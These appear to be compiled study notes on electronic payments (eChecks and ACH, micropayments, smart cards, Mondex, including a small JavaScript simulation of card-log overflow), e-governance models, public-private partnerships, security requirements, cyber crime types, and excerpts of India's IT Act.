The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately and electronically through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.


Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more.

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.

2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.

3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.

4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks.

5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features.

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the eCheck, and the public key is the key given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.

2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.

3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible.

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.

2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.

3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.

4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service.

1. Payer (customer/bill payer) is prompted to authorize electronic debit and enter bank routing number (ABA) and account number.

2. Merchant's sales system securely transfers order information to CyberSource over the Internet.

3. CyberSource forwards bank routing number and account number to processor.

4. The routing number and account number are validated and the integrity of the account's checking history is verified. Processor forwards approve/decline results to CyberSource.

5. CyberSource returns approval/decline message to merchant.

6. If approved, CyberSource routes check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.

Four Different Scenarios of the FSTC E-check System -


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as a micropayment method, is emerging to cater for very low value transactions. Examples:

Millicent (pre-payment/credit based)

PayWord (post-payment)


MICRO PAYMENT IS -

Very small payments made over the Web

Transactions too small for credit cards

Can be as little as a fraction of a cent

Alternative to subscription and advertising

Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks -

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments are applicable for businesses where even small costs for every single transaction would be inefficient [4]. The main benefits for the customer in using micropayments are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small amounts, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before any return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options -

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below [6].

Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment the customer receives access to the purchased product.

Credit card: Payment per credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by VISA™ and MasterCard SecureCode™).

Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses -

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009 a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing [2]. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input, which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized with a microchip embedded on it

Two types:

Memory-only chips

Microprocessor chips

Can hold up to 32,000 bytes

Newer smart cards have math co-processors

Perform complex encryption routines quickly

In 1968 German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards -

Why Smart Cards -

Improve the convenience and security of any transaction

Provide tamper-proof storage of user and account identity

Provide vital components of system security

Protect against a full range of security threats

Advantages -

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications -

Ticketless travel

Seoul bus system: 4M cards, 1B transactions since 1996

Planned for the SF Bay Area system

Authentication, ID

Medical records

Ecash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Example: Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards

Transfer of electronic money over the Internet or telephone networks etc

Keep transaction records

Password protection and "lock card" functions

Portable balance finder to check balance

Support multiple currencies


ADVANTAGES

CONSUMER -

Convenience

Accessibility

On chip record of recent transactions

Home load

Internet purchases

MERCHANT -

Reliable off-line payment

Higher security

Low transaction cost

Reduced cash handling

FINANCIAL INSTITUTION -

Strengthen customer relationships

New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? -

Principles protected:

o Limits for collecting personal information

o limits for using disclosing and keeping personal information

o keeping personal information accurate

o safeguarding personal information


Limits for collecting personal information

o loads from account

o deposits into account

o lost transactions

Limits for using disclosing and keeping personal information

o safeguard deposits

o to reimburse for non-performance

Keeping personal information accurate

o load and unload are online

o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information

o firewalls in Multos - between applications - ITSEC 6 designation

o transaction data to retailer is deliberately limited

o individual transaction data is not collected by banks - Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 - two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.
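To make the overflow problem concrete, the following is an added example written for these notes (not Mondex code, and not a description of the real card's internal format). It models a stored-value card with offline card-to-card transfers and the "rolling 10 transactions" log mentioned earlier, and then runs the bank-side reconciliation that an ATM upload would perform. The card names, balances and transfer amounts are constructed; the log capacity of 10 is taken from the notes.

```javascript
// Added example (not Mondex's or the page's own code): a simplified stored-value card
// with offline card-to-card transfers and a rolling log of the last 10 transactions.
// It shows the overflow problem: once more than 10 transfers happen before an upload,
// the earliest records are gone and the bank can no longer reconcile the balance.
const LOG_CAPACITY = 10; // "rolling 10 transactions" (from the notes)

class StoredValueCard {
  constructor(id, balanceCents) {
    this.id = id;
    this.balance = balanceCents;
    this.log = [];
    this.seq = 0; // monotonically increasing transaction counter
  }

  record(entry) {
    this.log.push({ seq: ++this.seq, ...entry });
    if (this.log.length > LOG_CAPACITY) this.log.shift(); // oldest record overwritten
  }

  // Offline transfer: both cards update locally, no bank involved.
  static transfer(from, to, amountCents, when) {
    if (!Number.isInteger(amountCents) || amountCents <= 0) throw new Error('bad amount');
    if (from.balance < amountCents) throw new Error('insufficient value on card');
    from.balance -= amountCents;
    to.balance += amountCents;
    from.record({ type: 'debit', peer: to.id, amountCents, when });
    to.record({ type: 'credit', peer: from.id, amountCents, when });
  }
}

// Bank side, at the next ATM use or retailer upload: replay the uploaded log from the
// last known balance and compare with the balance the card reports.
function reconcile(card, lastKnownBalanceCents) {
  const net = card.log.reduce(
    (sum, e) => sum + (e.type === 'credit' ? e.amountCents : -e.amountCents), 0);
  const expected = lastKnownBalanceCents + net;
  return {
    auditable: expected === card.balance,
    unexplainedCents: card.balance - expected,   // value moved by records already lost
    oldestRetainedSeq: card.log.length ? card.log[0].seq : null,
  };
}

// Load a card with 50.00 (constructed), make `transfers` offline payments of 1.00 each,
// then reconcile against the balance the bank last saw.
function demo(transfers) {
  const alice = new StoredValueCard('card-A', 5000);
  const bob = new StoredValueCard('card-B', 0);
  for (let i = 0; i < transfers; i++) StoredValueCard.transfer(alice, bob, 100, `t${i}`);
  return { balance: alice.balance, retained: alice.log.length, ...reconcile(alice, 5000) };
}
```

With 8 transfers the log still explains every cent and `auditable` is true; with 12 transfers the two oldest records have been overwritten, the log accounts for only 10.00 of the 12.00 that left the card, and reconciliation reports 2.00 of unexplained movement. That gap is exactly what the critics quoted above mean: whether those two lost transactions were legitimate or fraudulent can no longer be determined from the card.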

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available - government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance -

Both the terms are treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration - combined with organizational change and new skills - to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, when taken as a definition of e-governance, is that it makes no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. The Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state-wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have reached them. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or anywhere through the network. This is because of the characteristics of CORBA - it is location transparent, language independent, implementation independent and Operating System independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secure Sockets Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community - providers of goods and services - to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally but not always involving:

- Long Term Contracts

- User Charges and/or Payments flowing between the Parties

- Shared Investments, but Mainly Private

- Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room

• As a Way of Financing the Project

• Separate Policy & Regulation from Operations

• Make the Good or Service Available

• Pay for Performance and Output

• Introduce Competition - For and In the Market


The Need to Set the Right Priorities -

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps

Crafting the Partnership

Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis

What's the need?

What's driving the need / rationale?

Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?

Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback and economics?

Master Schedule/Budget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow

Procurement Approach

Sole Source, RFP, Low Bid

Risk Allocation between Public and private Partners

Structuring of Contract / Risks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries, which hold the top three scores on the readiness index, all share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will depend heavily on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish a policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS, with continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.

Authorization: the capability to grant access rights to resources; the process of verifying that someone has the rights to do what she is trying to do.

Confidentiality: the capability to prevent unauthorized access to information.

Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.

Non-repudiation: the capability to prevent a person or system involved in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are:

Protecting premises, equipment and systems software, including input-output units

Protecting software applications used to process personal data

Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public-organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques such as packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis

Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness

Continually improve its control environment

Effectively achieve legal and regulatory compliance

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries that were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

121 Million Internet Users

65 Million Active Internet Users, up by 28% from 51 million in 2010

50 Million users shop online on E-commerce and Online Shopping Sites

46+ Million Social Network Users

346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever with the intent to cause, or knowing that he is likely to cause, wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

Secures access

Downloads, copies or extracts any data, computer database or any information

Introduces or causes to be introduced any virus or contaminant

Disrupts or causes disruption

Denies or causes denial of access to any person

Provides any assistance to any person to facilitate access

Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section - 43

Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to two three years or with fine which may extend to five lakh rupees or with both" [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

Any information that is grossly offensive or has menacing character; or

Any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or

Any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh"

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees"

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both"

S 67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees"

S 67C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

